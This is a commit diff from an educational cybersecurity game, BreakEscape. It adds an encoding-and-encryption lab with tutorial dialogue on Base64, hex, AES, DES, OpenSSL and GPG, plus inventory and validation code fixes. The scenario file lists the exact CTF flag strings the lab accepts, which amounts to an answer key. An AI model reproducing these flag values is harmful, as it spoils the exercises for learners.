cybersecurity/BreakEscape
1
0
Fork 0
mirror of https://github.com/cliffe/BreakEscape.git synced 2026-02-21 11:18:08 +00:00
Code Issues Packages Projects Releases Wiki Activity

Enhance scenario validation and improve timed conversation structure

Browse Source 
- Updated `validate_scenario.rb` to enforce correct usage of `targetKnot` in timed conversations, ensuring compliance with new requirements.
- Added checks for missing properties in timed conversations, including `delay` and `targetKnot`, to improve scenario integrity.
- Enhanced logging for validation issues, providing clearer feedback on scenario configuration errors.
- Updated relevant scenarios to align with the new validation rules, ensuring consistency across gameplay elements.
This commit is contained in:
Z. Cliffe Schreuders
2025-12-04 23:15:03 +00:00
parent 996a4ab6ce
commit d327380fac
39 changed files with 8123 additions and 16 deletions
Download Patch File Download Diff File Expand all files Collapse all files

5
app/models/break_escape/game.rb
View File

@@ -660,8 +660,9 @@ module BreakEscape
self.player_state['inventory'] = []
end
# Initialize starting items from scenario
if scenario_data && scenario_data['startItemsInInventory']
# Initialize starting items from scenario (only if inventory is empty)
# This prevents duplicates if initialize_player_state is called multiple times
if scenario_data && scenario_data['startItemsInInventory'] && self.player_state['inventory'].empty?
start_items = scenario_data['startItemsInInventory']
if start_items.is_a?(Array)
# Use dup instead of deep_dup to avoid issues with ActiveSupport extensions

54
planning_notes/lab_conversion/lab_conversion_prompt.md
View File

@@ -35,7 +35,8 @@ From the XML file, identify:
- **IP addresses** for each system
- **Number of flags** and which systems they're on
- **Lab sheet URL** (if present in XML)
- **Difficulty level** and **CyBOK topics**
- **Difficulty level** (from `<difficulty>` tag)
- **CyBOK topics** - **CRITICAL**: Copy these DIRECTLY from the XML file (see CyBOK section below)
## Step 2: Create New Scenario Directory
@@ -46,7 +47,48 @@ From the XML file, identify:
- Update `description` to describe the lab content
- Set `difficulty_level` appropriately (1-5)
- Update `secgen_scenario` to match the XML path (e.g., `"labs/introducing_attacks/2_malware_msf_payloads.xml"`)
- Update `cybok` array with relevant topics and keywords from the XML
- **Update `cybok` array**: Copy CyBOK entries DIRECTLY from the SecGen XML file (see detailed instructions below)
### 2.1 Extracting CyBOK Metadata from SecGen XML
**IMPORTANT**: The CyBOK metadata in `mission.json` must match exactly what is defined in the SecGen XML scenario file. Do not create your own CyBOK entries - copy them from the XML.
In the SecGen XML file, CyBOK entries look like this:
```xml
<CyBOK KA="MAT" topic="Attacks and exploitation">
<keyword>EXPLOITATION</keyword>
<keyword>EXPLOITATION FRAMEWORKS</keyword>
</CyBOK>
<CyBOK KA="SOIM" topic="PENETRATION TESTING">
<keyword>PENETRATION TESTING - SOFTWARE TOOLS</keyword>
<keyword>PENETRATION TESTING - ACTIVE PENETRATION</keyword>
</CyBOK>
```
Convert each `<CyBOK>` element to a JSON object in the `cybok` array:
```json
"cybok": [
{
"ka": "MAT",
"topic": "Attacks and exploitation",
"keywords": ["EXPLOITATION", "EXPLOITATION FRAMEWORKS"]
},
{
"ka": "SOIM",
"topic": "PENETRATION TESTING",
"keywords": ["PENETRATION TESTING - SOFTWARE TOOLS", "PENETRATION TESTING - ACTIVE PENETRATION"]
}
]
```
**Conversion rules:**
- `KA` attribute → `"ka"` field (keep exact value, e.g., "MAT", "SOIM", "NS")
- `topic` attribute → `"topic"` field (keep exact capitalization and wording)
- Each `<keyword>` element → add to `"keywords"` array (keep exact capitalization)
**Example from converted labs:**
- `lab_vulnerabilities/mission.json` correctly matches its SecGen XML file
- `lab_intro_linux/mission.json` may need correction to match its XML (currently has different CyBOK entries)
## Step 3: Copy and Edit the Ink File
@@ -139,10 +181,11 @@ From the XML file, identify:
- Set `timedConversation`:
```json
"timedConversation": {
"delay": 3000,
"knot": "intro_timed"
"delay": 5000,
"targetKnot": "intro_timed"
}
```
**Important**: Use `targetKnot` (not `knot`) and set delay to 5000ms (5 seconds) to give players time to see the room before the conversation starts
- Add `eventMappings` if you want to trigger conversations on aim completion:
```json
"eventMappings": [
@@ -209,6 +252,7 @@ Before considering the conversion complete:
- [ ] Flag station configured with correct `acceptsVms` and flags
- [ ] Lab workstation URL is correct
- [ ] Mission.json has correct SecGen scenario path
- [ ] **CyBOK metadata in `mission.json` matches the SecGen XML file exactly** (KA codes, topics, and keywords must be identical)
## Example Conversion Pattern
@@ -225,7 +269,7 @@ Here's the pattern used for `lab_intro_linux`:
- Created `submit_flags` task with `targetFlags: ["desktop-flag1", "desktop-flag2"]`
- Configured VM launchers for "kali" and "desktop" systems
- Configured flag station to accept flags from "desktop" VM
- Added timed conversation with 3 second delay
- Added timed conversation with 5 second delay (5000ms) using `targetKnot: "intro_timed"`
- Added event mapping for aim completion
3. **Result:**

68
public/break_escape/js/systems/inventory.js
View File

@@ -8,7 +8,17 @@ import { CSRF_TOKEN } from '../config.js';
// Helper function to create a unique identifier for an item
export function createItemIdentifier(scenarioData) {
if (!scenarioData) return 'unknown';
return `${scenarioData.type}_${scenarioData.name || 'unnamed'}`;
// Use id or key_id if available for more precise matching
const itemId = scenarioData.id || scenarioData.key_id || '';
const itemName = scenarioData.name || 'unnamed';
const itemType = scenarioData.type || 'unknown';
// If we have an ID, use it for precise matching
if (itemId) {
return `${itemType}_${itemId}`;
}
// Otherwise fall back to type + name
return `${itemType}_${itemName}`;
}
// Initialize the inventory system
@@ -128,12 +138,33 @@ export function processInitialInventoryItems() {
return;
}
// Ensure inventory is initialized before processing
if (!window.inventory || !Array.isArray(window.inventory.items)) {
console.warn('Inventory not initialized, initializing now');
initializeInventory();
}
// Track if we've already processed initial items to prevent duplicates
if (window.inventory._initialItemsProcessed) {
console.warn('Initial inventory items already processed - skipping to prevent duplicates');
return;
}
// Mark as processed before adding items
window.inventory._initialItemsProcessed = true;
// Priority 1: Use server-side inventory if available (for page reload recovery)
if (window.gameScenario.playerInventory && Array.isArray(window.gameScenario.playerInventory)) {
console.log(`Processing ${window.gameScenario.playerInventory.length} items from server inventory`);
window.gameScenario.playerInventory.forEach(itemData => {
console.log(`Adding ${itemData.name} to inventory from server playerInventory`);
// Skip notepad as it's already added in initializeInventory
if (itemData.type === 'notepad') {
console.log('Skipping notepad - already in inventory');
return;
}
console.log(`Adding ${itemData.name || itemData.type} to inventory from server playerInventory`);
// Create inventory sprite for this object
const inventoryItem = createInventorySprite(itemData);
@@ -149,7 +180,13 @@ export function processInitialInventoryItems() {
console.log(`Processing ${window.gameScenario.startItemsInInventory.length} starting inventory items`);
window.gameScenario.startItemsInInventory.forEach(itemData => {
console.log(`Adding ${itemData.name} to inventory from startItemsInInventory`);
// Skip notepad as it's already added in initializeInventory
if (itemData.type === 'notepad') {
console.log('Skipping notepad - already in inventory');
return;
}
console.log(`Adding ${itemData.name || itemData.type} to inventory from startItemsInInventory`);
// Create inventory sprite for this object
const inventoryItem = createInventorySprite(itemData);
@@ -221,12 +258,29 @@ export async function addToInventory(sprite) {
// Check if the item is already in the inventory (local check first)
const itemIdentifier = createItemIdentifier(sprite.scenarioData);
const isAlreadyInInventory = window.inventory.items.some(item =>
item && createItemIdentifier(item.scenarioData) === itemIdentifier
);
const itemData = sprite.scenarioData;
// More robust duplicate check - compare by identifier, or by id/key_id if available
const isAlreadyInInventory = window.inventory.items.some(item => {
if (!item || !item.scenarioData) return false;
const existingIdentifier = createItemIdentifier(item.scenarioData);
if (existingIdentifier === itemIdentifier) {
return true;
}
// Also check by id/key_id if both items have them
const itemId = itemData.id || itemData.key_id;
const existingId = item.scenarioData.id || item.scenarioData.key_id;
if (itemId && existingId && itemId === existingId) {
return true;
}
return false;
});
if (isAlreadyInInventory) {
console.log(`Item ${itemIdentifier} is already in inventory`);
console.log(`Item ${itemIdentifier} (id: ${itemData.id || itemData.key_id || 'none'}) is already in inventory - skipping duplicate`);
return false;
}

513
scenarios/lab_encoding_encryption/ink/instructor.ink Normal file
View File

@@ -0,0 +1,513 @@
// ===========================================
// CRYPTOGRAPHY LAB: ENCODING AND ENCRYPTION
// Introduction to Cryptography
// ===========================================
// Game-Based Learning replacement for lab sheet
// Original: cyber_security_landscape/4_encoding_encryption.md
// ===========================================
// Global persistent state
VAR instructor_rapport = 0
// Global variables (synced from scenario.json.erb)
VAR player_name = "Agent 0x00"
// ===========================================
// ENTRY POINT
// ===========================================
=== start ===
~ instructor_rapport = 0
Welcome back, {player_name}. What would you like to discuss?
-> crypto_hub
// ===========================================
// TIMED INTRO CONVERSATION (Game Start)
// ===========================================
=== intro_timed ===
~ instructor_rapport = 0
Welcome to Cryptography Fundamentals, {player_name}. I'm your Crypto Instructor for this session.
Today we're covering encoding and encryption - two concepts that sound similar but serve very different purposes.
You'll learn about encoding schemes like Base64 and hexadecimal, symmetric encryption with AES and DES, and asymmetric cryptography with GPG.
These skills are essential for any security professional. Let me explain how this lab works. You'll find three key resources here:
First, there's a Lab Sheet Workstation in this room. This gives you access to detailed written instructions and exercises that complement our conversation. Use it to follow along with the material.
Second, in the VM lab room to the north, you'll find terminals to launch virtual machines. You'll work with a desktop system for hands-on practice with encoding and encryption challenges.
Finally, there's a Flag Submission Terminal where you'll submit flags you capture during the exercises. These flags demonstrate that you've successfully completed the challenges.
You can talk to me anytime to explore cryptography concepts, get tips, or ask questions about the material. I'm here to help guide your learning.
Ready to get started? Feel free to ask me about any topic, or head to the lab sheet workstation and VM room when you're ready to begin the practical exercises.
-> crypto_hub
// ===========================================
// MAIN HUB
// ===========================================
=== crypto_hub ===
What would you like to explore?
+ [Encoding vs Encryption - what's the difference?]
-> encoding_vs_encryption
+ [Character encoding and ASCII]
-> character_encoding
+ [Hexadecimal and Base64]
-> hex_and_base64
+ [Symmetric key encryption]
-> symmetric_encryption
+ [Public key cryptography]
-> public_key_crypto
+ [OpenSSL tools and commands]
-> openssl_tools
+ [GPG key management]
-> gpg_intro
+ [Show me the commands reference]
-> commands_reference
+ [I'm ready for the practical challenges]
-> ready_for_practice
+ [That's all for now]
#exit_conversation
-> END
// ===========================================
// ENCODING VS ENCRYPTION
// ===========================================
=== encoding_vs_encryption ===
~ instructor_rapport += 5
#influence_increased
Excellent starting point. These terms get confused constantly.
Encoding transforms data into a different format using a publicly known, reversible scheme. Anyone can decode it - no secret required.
Encryption transforms data into a format readable only with a key or password. Without the key, the data is protected.
Think of it this way: encoding is like translating a book to a different language. Anyone with the right dictionary can read it. Encryption is like using a secret cipher - only those with the key can decode it.
* [Why use encoding if it's not secure?]
~ instructor_rapport += 8
#influence_increased
You: If encoding doesn't provide security, why use it?
Compatibility and efficiency. Base64, for instance, lets you safely transmit binary data over text-only protocols like email. Hexadecimal makes binary data human-readable for debugging.
Encoding solves technical problems. Encryption solves security problems. Different tools for different jobs.
* [Can you give examples of each?]
You: What are common examples of encoding and encryption?
Encoding: Base64, hexadecimal, ASCII, URL encoding. Used for data representation.
Encryption: AES, RSA, DES. Used for data protection.
If you find Base64 data, don't assume it's encrypted - it's just encoded. Trivial to reverse.
* [Got it]
You: Clear distinction.
- -> crypto_hub
// ===========================================
// CHARACTER ENCODING
// ===========================================
=== character_encoding ===
~ instructor_rapport += 5
#influence_increased
Let's start with the basics - how computers represent text.
ASCII - American Standard Code for Information Interchange. Maps characters to numbers. For example, "hello!" is: Decimal: 104 101 108 108 111 33, Hex: 68 65 6c 6c 6f 21, Binary: 01101000 01100101 01101100 01101100 01101111 00100001
All the same data, just different representations.
* [Why multiple representations?]
~ instructor_rapport += 8
#influence_increased
You: Why do we need so many ways to represent the same thing?
Context. Humans read decimal. Computers process binary. Hex is compact for humans to read binary - two hex digits per byte.
Choose the representation that fits your needs. Debugging network traffic? Hex. Mathematical operations? Decimal. Actual processing? Binary.
* [Tell me about Unicode]
You: How does Unicode fit in?
ASCII is 7-bit, covers English characters. Unicode extends this to support every language, emoji, symbols.
UTF-8 is the dominant Unicode encoding - backward-compatible with ASCII, supports international characters efficiently.
Most modern systems use UTF-8 by default.
* [Show me practical commands]
You: What commands convert between these formats?
`xxd` is your friend. Try: `echo hello!` piped to `xxd` for hex output, `echo hello!` piped to `xxd -b` for binary, `echo 68656c6c6f21` piped to `xxd -r -p` to convert hex back to text.
Python's also excellent: `"hello!".encode().hex()` gets you hex.
- -> crypto_hub
// ===========================================
// HEX AND BASE64
// ===========================================
=== hex_and_base64 ===
~ instructor_rapport += 5
#influence_increased
Two encoding schemes you'll encounter constantly: hexadecimal and Base64.
Hexadecimal: Base-16. Uses 0-9 and a-f. Two hex characters per byte. Compact, human-readable representation of binary data.
Base64: Uses A-Z, a-z, 0-9, +, /, and = for padding. More efficient than hex for transmitting binary data. Four characters represent three bytes.
* [When do I use Base64 vs hex?]
~ instructor_rapport += 10
#influence_increased
You: How do I choose between Base64 and hex?
Base64 when efficiency matters - 33% overhead vs 100% for hex. Common in web protocols, email attachments, JSON/XML with binary data.
Hex when human readability and debugging matter. Easier to spot patterns, map directly to bytes.
In CTFs and forensics? You'll see both constantly. Learn to recognize them on sight.
* [Show me Base64 commands]
You: Walk me through Base64 encoding.
Simple: `echo "text"` piped to `base64` encodes. `echo "encoded"` piped to `base64 -d` decodes.
Try this chain: `echo "Valhalla"` piped to `base64` piped to `xxd -p` piped to `xxd -r -p` piped to `base64 -d`
You're encoding to Base64, converting to hex, converting back, decoding Base64. Should get "Valhalla" back. Demonstrates reversibility.
* [How do I recognize Base64?]
You: How can I identify Base64 when I see it?
Look for: alphanumeric characters, sometimes with + and /, often ending in = or ==.
Length is always multiple of 4 (due to padding).
Classic tell: mix of uppercase, lowercase, and numbers, ending in equals signs.
Example: `VmFsaGFsbGEK` - that's Base64.
- -> crypto_hub
// ===========================================
// SYMMETRIC ENCRYPTION
// ===========================================
=== symmetric_encryption ===
~ instructor_rapport += 5
#influence_increased
Symmetric encryption - the same key encrypts and decrypts. Fast, efficient, but has a key distribution problem.
Two main algorithms you'll use: DES and AES.
* [Tell me about DES]
You: What's DES?
-> des_explanation
* [Tell me about AES]
You: What's AES?
-> aes_explanation
* [What's the key distribution problem?]
~ instructor_rapport += 10
#influence_increased
You: You mentioned a key distribution problem?
The fundamental challenge of symmetric crypto: how do you securely share the key?
If you encrypt a message with AES, your recipient needs the same key to decrypt. How do you get them the key without an attacker intercepting it?
This is where public key crypto comes in - or secure key exchange protocols like Diffie-Hellman.
-> symmetric_encryption
* [Back to main menu]
-> crypto_hub
=== des_explanation ===
~ instructor_rapport += 5
#influence_increased
DES - Data Encryption Standard. Developed by IBM in the 1970s, based on Feistel ciphers.
56-bit key size. Small by modern standards - brute-forceable in reasonable time with modern hardware.
Historical importance, but don't use it for real security anymore. Superseded by AES.
OpenSSL command: `openssl enc -des-cbc -pbkdf2 -in file.txt -out file.enc`
* [Why is 56-bit insufficient?]
~ instructor_rapport += 8
#influence_increased
You: Why is 56 bits too small?
2^56 possible keys - about 72 quadrillion. Sounds large, but modern systems can test millions or billions of keys per second.
DES was cracked in less than 24 hours in 1999. Hardware has only improved since then.
Compare to AES-256: 2^256 keys. Astronomically larger. Not brute-forceable with current or foreseeable technology.
* [Show me the decryption command]
You: How do I decrypt DES-encrypted data?
`openssl enc -des-cbc -d -in file.enc -out decrypted.txt`
The `-d` flag specifies decryption. You'll be prompted for the password.
Note: password and key aren't quite the same. The password is hashed with PBKDF2 to derive the actual encryption key.
- -> symmetric_encryption
=== aes_explanation ===
~ instructor_rapport += 5
#influence_increased
AES - Advanced Encryption Standard. The modern symmetric encryption standard.
128-bit block cipher. Key sizes: 128, 192, or 256 bits. Uses substitution-permutation network - combination of substitution, permutation, mixing, and key addition.
Fast, secure, widely supported. This is what you should be using for symmetric encryption.
* [How much stronger is AES than DES?]
~ instructor_rapport += 10
#influence_increased
You: Quantify the security improvement over DES.
DES: 2^56 keyspace. AES-128: 2^128. AES-256: 2^256.
AES-128 has 2^72 times more keys than DES. AES-256 has 2^200 times more keys than AES-128.
To put it in perspective: if you could test a trillion trillion keys per second, AES-256 would still take longer than the age of the universe to brute force.
Practical attacks on AES focus on implementation flaws, side channels, or compromising the key - not brute forcing.
* [Show me AES commands]
You: Walk me through AES encryption.
Encrypt: `openssl enc -aes-256-cbc -pbkdf2 -in file.txt -out file.enc`
Decrypt: `openssl enc -aes-256-cbc -d -in file.enc -out file.txt`
You can use -aes-128-cbc, -aes-192-cbc, or -aes-256-cbc depending on key size.
CBC mode is Cipher Block Chaining. ECB mode also available but has security weaknesses - avoid for real use.
* [What's CBC mode?]
~ instructor_rapport += 8
#influence_increased
You: Explain CBC mode.
Cipher Block Chaining. Each block of plaintext is XORed with the previous ciphertext block before encryption.
This means identical plaintext blocks produce different ciphertext - hides patterns.
ECB (Electronic Codebook) encrypts each block independently - same input always produces same output. Leaks pattern information.
Always use CBC or more modern modes like GCM. Never use ECB for real data.
- -> symmetric_encryption
// ===========================================
// PUBLIC KEY CRYPTOGRAPHY
// ===========================================
=== public_key_crypto ===
~ instructor_rapport += 5
#influence_increased
Asymmetric cryptography. Revolutionary concept - separate keys for encryption and decryption.
Public key: shared freely. Anyone can use it to encrypt messages to you.
Private key: kept secret. Only you can decrypt messages encrypted with your public key.
Solves the key distribution problem. You can publish your public key openly - doesn't compromise security.
* [How does this actually work?]
~ instructor_rapport += 10
#influence_increased
You: What's the underlying mechanism?
Mathematics - specifically, functions that are easy to compute in one direction but extremely hard to reverse without special information.
RSA uses factoring large prime numbers. Easy to multiply two huge primes, nearly impossible to factor the result back without knowing the primes.
Your private key contains the primes. Your public key contains their product. Encryption uses the product, decryption needs the primes.
Full math is beyond this course, but that's the essence. One-way mathematical trap doors.
* [What's the downside?]
~ instructor_rapport += 8
#influence_increased
You: This sounds perfect. What's the catch?
Performance. Asymmetric crypto is much slower than symmetric.
Typical use: asymmetric crypto to exchange a symmetric key, then symmetric crypto for actual data.
TLS/SSL does exactly this - RSA or ECDH to agree on a session key, then AES to encrypt the connection.
Hybrid approach gets security of asymmetric with performance of symmetric.
* [Tell me about GPG]
You: How does GPG fit into this?
GPG - GNU Privacy Guard. Open source implementation of PGP (Pretty Good Privacy).
Provides public-key crypto for email encryption, file encryption, digital signatures.
Industry standard for email security and file protection.
-> gpg_intro
- -> crypto_hub
// ===========================================
// OPENSSL TOOLS
// ===========================================
=== openssl_tools ===
~ instructor_rapport += 5
#influence_increased
OpenSSL - the Swiss Army knife of cryptography.
It's a toolkit implementing SSL/TLS protocols and providing cryptographic functions. Command-line tool plus libraries.
Can do: key generation, encryption, decryption, hashing, certificate management, SSL/TLS testing, and much more.
* [Show me useful commands]
You: What are the most useful OpenSSL commands?
List available ciphers: `openssl list -cipher-algorithms`
Generate hash: `echo "data"` piped to `openssl dgst -sha256`
Encrypt file: `openssl enc -aes-256-cbc -in file -out file.enc`
Check certificate: `openssl x509 -in cert.pem -text -noout`
Test SSL connection: `openssl s_client -connect example.com:443`
Generate random bytes: `openssl rand -hex 32`
* [Tell me about the 2014 vulnerability]
~ instructor_rapport += 15
#influence_increased
You: You mentioned a major OpenSSL vulnerability in 2014?
Heartbleed. CVE-2014-0160. One of the most significant security flaws in internet history.
Bug in OpenSSL's implementation of TLS heartbeat extension. Allowed attackers to read server memory - including private keys, passwords, session tokens.
Affected two-thirds of web servers. Required widespread patching and certificate replacement.
Important lesson: even cryptographic implementations can have bugs. The algorithms (AES, RSA) were fine - the implementation was flawed.
This is why: keep software updated, use well-audited libraries, implement defense in depth.
* [How do I check OpenSSL version?]
You: How do I know what version I'm running?
`openssl version -a` shows version and build details.
Post-Heartbleed, you want OpenSSL 1.0.1g or later, or 1.0.2 series.
Most modern systems use OpenSSL 1.1.1 or 3.x now.
- -> crypto_hub
// ===========================================
// GPG INTRODUCTION
// ===========================================
=== gpg_intro ===
~ instructor_rapport += 5
#influence_increased
GPG - GNU Privacy Guard. Open-source public-key cryptography and signing tool.
Core concepts: key pairs (public and private), encryption, decryption, signing, verification.
* [Walk me through key generation]
You: How do I create GPG keys?
`gpg --gen-key` starts the process. You'll provide name, email, passphrase.
This creates a key pair. Public key you share, private key you protect.
The passphrase protects your private key - don't forget it! Without it, your private key is useless.
* [How do I share my public key?]
You: How do others get my public key?
Export it: `gpg --export -a "Your Name" > public.key`
This creates ASCII-armored public key file. Share it via email, website, key server.
Recipients import it: `gpg --import public.key`
Now they can encrypt messages only you can read.
* [Encrypting and decrypting]
You: Show me the encryption workflow.
Encrypt: `gpg -e -r "Recipient Name" file.txt` creates file.txt.gpg
Decrypt: `gpg -d file.txt.gpg > decrypted.txt`
Recipient's public key must be in your keyring to encrypt for them.
Your private key must be available to decrypt messages to you.
* [What about digital signatures?]
~ instructor_rapport += 10
#influence_increased
You: How do signatures work?
Signatures prove a message came from you and wasn't modified.
Sign: `gpg -s file.txt` - creates file.txt.gpg with signature
Verify: `gpg --verify file.txt.gpg` - confirms signature and shows signer
Uses your private key to sign, others use your public key to verify. Reverse of encryption.
Provides authenticity and integrity - critical for software distribution, secure communications.
- -> crypto_hub
// ===========================================
// COMMANDS REFERENCE
// ===========================================
=== commands_reference ===
Quick reference for the commands we've covered:
Encoding:
- Hex: `echo "text"` piped to `xxd -p` (encode), `echo "hex"` piped to `xxd -r -p` (decode)
- Base64: `echo "text"` piped to `base64` (encode), `echo "b64"` piped to `base64 -d` (decode)
- View as binary: `xxd -b file`
Symmetric Encryption (OpenSSL):
- AES encrypt: `openssl enc -aes-256-cbc -pbkdf2 -in file -out file.enc`
- AES decrypt: `openssl enc -aes-256-cbc -d -in file.enc -out file.txt`
- DES encrypt: `openssl enc -des-cbc -pbkdf2 -in file -out file.enc`
- List ciphers: `openssl list -cipher-algorithms`
Public Key Crypto (GPG):
- Generate keys: `gpg --gen-key`
- List keys: `gpg --list-keys`
- Export public: `gpg --export -a "Name" > public.key`
- Import key: `gpg --import key.asc`
- Encrypt: `gpg -e -r "Recipient" file`
- Decrypt: `gpg -d file.gpg`
- Sign: `gpg -s file`
- Verify: `gpg --verify file.gpg`
Useful OpenSSL:
- Hash: `openssl dgst -sha256 file`
- Random data: `openssl rand -hex 32`
- Version: `openssl version`
+ [Back to main menu]
-> crypto_hub
// ===========================================
// READY FOR PRACTICE
// ===========================================
=== ready_for_practice ===
Excellent. You've covered the fundamentals.
In your VM's home directory, you'll find CTF challenges testing these skills: Decoding various encoded data, decrypting symmetrically-encrypted files, using GPG for secure communication, and breaking weak encryption.
Practical tips:
Recognize encoding schemes on sight: Base64 ends in =, hex is 0-9 and a-f, binary is only 0 and 1.
Try obvious passwords first: "password", "admin", "123456". Weak keys are common.
Check file headers: `file` command identifies file types even if extension is wrong. Encoded/encrypted data looks like random bytes.
Use CyberChef for quick analysis: Web tool that chains encoding/decoding operations. Great for CTFs.
Document what you try: When attempting decryption, track what keys/methods you've tested. Easy to lose track.
{instructor_rapport >= 50:
You've asked excellent questions and engaged deeply with the material. You're well-prepared.
}
Remember: encoding is reversible with no secret. Encryption requires keys. Symmetric uses same key for both. Asymmetric uses key pairs.
Now go break some crypto challenges. Good luck, Agent {player_name}.
#exit_conversation
-> END

1
scenarios/lab_encoding_encryption/ink/instructor.json Normal file
View File

File diff suppressed because one or more lines are too long

25
scenarios/lab_encoding_encryption/mission.json Normal file
View File

@@ -0,0 +1,25 @@
{
"display_name": "Encoding and Encryption Lab",
"description": "Learn essential knowledge and skills related to encoding schemes, hash algorithms, and the use of tools like OpenSSL and Gnu Privacy Guard (GPG). Explore concepts like encoding data into different formats, encrypting and decrypting information, and managing keys. Complete CTF challenges in the VM to put your knowledge into practice.",
"difficulty_level": 2,
"secgen_scenario": "labs/cyber_security_landscape/4_encoding_encryption.xml",
"collection": "vm_labs",
"cybok": [
{
"ka": "AC",
"topic": "Algorithms, Schemes and Protocols",
"keywords": ["Encoding vs Cryptography", "Caesar cipher", "Vigenere cipher", "SYMMETRIC CRYPTOGRAPHY - AES (ADVANCED ENCRYPTION STANDARD)"]
},
{
"ka": "F",
"topic": "Artifact Analysis",
"keywords": ["Encoding and alternative data formats"]
},
{
"ka": "WAM",
"topic": "Fundamental Concepts and Approaches",
"keywords": ["ENCODING", "BASE64"]
}
]
}

161
scenarios/lab_encoding_encryption/scenario.json.erb Normal file
View File

@@ -0,0 +1,161 @@
{
"scenario_brief": "Welcome to the Encoding and Encryption Lab! Your Crypto Instructor will guide you through encoding schemes, symmetric and asymmetric encryption, OpenSSL, and GPG. Complete the instruction and then practice your skills in the VM lab environment.",
"endGoal": "Complete the lab instruction with the Crypto Instructor, launch the VM, and capture all available flags from the desktop system to demonstrate your understanding of encoding and encryption techniques.",
"startRoom": "instruction_room",
"startItemsInInventory": [],
"globalVariables": {
"player_name": "Agent 0x00",
"lab_instruction_complete": false,
"vm_launched": false,
"encoding_encryption_flag_submitted": false,
"instructor_rapport": 0
},
"objectives": [
{
"aimId": "complete_vm_lab",
"title": "Complete VM Lab Exercises",
"description": "Capture all flags from the desktop system",
"status": "active",
"order": 0,
"tasks": [
{
"taskId": "submit_all_flags",
"title": "Submit all required flags from desktop",
"type": "submit_flags",
"targetFlags": ["desktop-flag1", "desktop-flag2", "desktop-flag3", "desktop-flag4", "desktop-flag5", "desktop-flag6", "desktop-flag7", "desktop-flag8", "desktop-flag9", "desktop-flag10", "desktop-flag11"],
"targetCount": 11,
"currentCount": 0,
"showProgress": true,
"status": "active"
}
]
}
],
"player": {
"id": "player",
"displayName": "Agent 0x00",
"spriteSheet": "hacker",
"spriteTalk": "assets/characters/hacker-talk.png",
"spriteConfig": {
"idleFrameStart": 20,
"idleFrameEnd": 23
}
},
"rooms": {
"instruction_room": {
"type": "room_office",
"connections": {
"north": "vm_lab_room"
},
"locked": false,
"npcs": [
{
"id": "crypto_instructor",
"displayName": "Crypto Instructor",
"npcType": "person",
"position": { "x": 3.5, "y": 3.5 },
"spriteSheet": "hacker-red",
"spriteTalk": "assets/characters/hacker-red-talk.png",
"spriteConfig": {
"idleFrameStart": 20,
"idleFrameEnd": 23
},
"storyPath": "scenarios/lab_encoding_encryption/ink/instructor.json",
"currentKnot": "start",
"timedConversation": {
"delay": 5000,
"targetKnot": "intro_timed"
},
"eventMappings": [
{
"eventPattern": "objective_aim_completed:complete_vm_lab",
"targetKnot": "flags_completed_congrats",
"conversationMode": "person-chat",
"autoTrigger": true,
"cooldown": 0
}
],
"itemsHeld": []
}
],
"objects": [
{
"type": "lab-workstation",
"id": "lab_workstation",
"name": "Lab Sheet Workstation",
"takeable": true,
"labUrl": "https://cliffe.github.io/HacktivityLabSheets/labs/cyber_security_landscape/4-encoding-encryption/",
"observations": "A workstation for accessing the lab sheet with detailed instructions and exercises"
},
{
"type": "notes",
"name": "Lab Welcome Guide",
"takeable": true,
"readable": true,
"text": "Welcome to the Encoding and Encryption Lab!\n\nOBJECTIVES:\n1. Use the Lab Sheet Workstation to access detailed lab instructions\n2. Complete the lab sheet exercises\n3. Launch the VM and practice encoding and encryption techniques\n4. Capture all flags from the desktop system\n\nThe Crypto Instructor is available if you need guidance.\n\nGood luck!",
"observations": "A guide to the lab structure and objectives"
},
{
"type": "notes",
"name": "VM Lab Instructions",
"takeable": true,
"readable": true,
"text": "VM Lab Practice Instructions:\n\n1. Launch the VM in the VM Lab Room:\n - Desktop Terminal: Your practice system with encoding and encryption challenges\n\n2. Your objectives:\n - Decode various encoded data (hex, base64, morse, braille, binary, decimal, octal, rot13)\n - Decrypt symmetrically-encrypted files (Caesar, shift, Vigenere)\n - Use GPG for secure communication\n - Break weak encryption\n - Find flags hidden in encoded and encrypted files\n\n3. Submit flags at the Flag Submission Terminal in the VM Lab Room\n\nFlags to capture from desktop:\n- flag1 through flag11 - Found in various encoded and encrypted files\n\nRemember what the instructor taught you about encoding vs encryption, OpenSSL, and GPG!",
"observations": "Instructions for the VM lab exercises"
}
]
},
"vm_lab_room": {
"type": "room_office",
"connections": {
"south": "instruction_room"
},
"locked": false,
"objects": [
{
"type": "vm-launcher",
"id": "vm_launcher_desktop",
"name": "Desktop Terminal",
"takeable": false,
"observations": "Terminal providing access to the desktop system for encoding and encryption practice",
"hacktivityMode": <%= vm_context && vm_context['hacktivity_mode'] ? 'true' : 'false' %>,
"vm": <%= vm_object('encoding_encryption', {
"id": 1,
"title": "desktop",
"ip": "172.16.0.2",
"enable_console": true
}) %>
},
{
"type": "flag-station",
"id": "flag_station_lab",
"name": "Lab Flag Submission Terminal",
"takeable": false,
"observations": "Submit flags captured from the desktop system here",
"acceptsVms": ["desktop"],
"flags": <%= flags_for_vm('desktop', [
'flag{encoding_encryption_hex}',
'flag{encoding_encryption_base64}',
'flag{encoding_encryption_morse}',
'flag{encoding_encryption_braille}',
'flag{encoding_encryption_binary}',
'flag{encoding_encryption_decimal}',
'flag{encoding_encryption_octal}',
'flag{encoding_encryption_rot13}',
'flag{encoding_encryption_caesar}',
'flag{encoding_encryption_shift}',
'flag{encoding_encryption_vigenere}'
]) %>,
"flagRewards": [
{
"type": "emit_event",
"event_name": "encoding_encryption_flag_submitted",
"description": "Encoding and encryption flag submitted - demonstrates cryptography skills"
}
]
}
]
}
}
}

985
scenarios/lab_exploitation/ink/instructor.ink Normal file
View File

@@ -0,0 +1,985 @@
// ===========================================
// FROM SCANNING TO EXPLOITATION LAB
// From Scanning to Exploitation
// ===========================================
// Game-Based Learning replacement for lab sheet
// Original: introducing_attacks/6_exploitation.md
// Based on HacktivityLabSheets: introducing_attacks/6_exploitation.md
// Author: Z. Cliffe Schreuders, Anatoliy Gorbenko, Tom Shaw, Thalita Vergilio
// License: CC BY-SA 4.0
// ===========================================
// Global persistent state
VAR instructor_rapport = 0
VAR exploitation_mastery = 0
// Global variables (synced from scenario.json.erb)
VAR player_name = "Agent 0x00"
// ===========================================
// ENTRY POINT
// ===========================================
=== start ===
~ instructor_rapport = 0
~ exploitation_mastery = 0
Welcome back, {player_name}. What would you like to discuss?
-> exploitation_hub
// ===========================================
// TIMED INTRO CONVERSATION (Game Start)
// ===========================================
=== intro_timed ===
~ instructor_rapport = 0
~ exploitation_mastery = 0
